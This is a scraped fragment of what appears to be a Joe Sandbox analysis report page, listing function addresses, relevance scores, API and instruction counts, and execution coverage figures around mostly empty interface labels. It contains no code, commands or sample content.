Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405B69 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405CA3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 11.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 8.8% |
Total number of Nodes: | 34 |
Total number of Limit Nodes: | 5 |
Graph
Function 003370A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0033F0F8 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0033709A Relevance: 1.6, APIs: 1, Instructions: 68COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0033F1C8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0030D030 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0030D02B Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0033FB24 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|